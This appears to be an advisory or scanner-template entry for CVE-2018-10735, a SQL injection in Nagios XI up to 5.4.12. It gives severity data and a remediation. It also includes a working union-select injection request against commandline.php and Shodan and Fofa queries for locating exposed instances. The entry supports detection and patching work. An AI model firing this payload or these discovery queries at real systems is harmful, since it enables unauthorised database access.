| Title | NagiosXI <= 5.4.12 `commandline.php` SQL injection |
|---|---|
| Author | DhiyaneshDk |
| Severity | High |
| Impact | Authenticated administrators can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire Nagios XI instance. |
| Remediation | Upgrade to Nagios XI version 5.4.13 or later. |
| CVSS Score | 7.2 |
| EPSS Score | 0.86271 |
| CVE ID | CVE-2018-10735 |
| CWE ID | CWE-89 |
| Shodan Query | http.title:"nagios xi" |
| Fofa Query | app="Nagios-XI"title="nagios xi"app="nagios-xi" |
| Tags | cve cve2018 nagios sqli vuln |
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/commandline.php cname parameter.
GET /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(9680))%23 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 MarketGoo/2.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-10735.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-10735.pcap
N/AN/A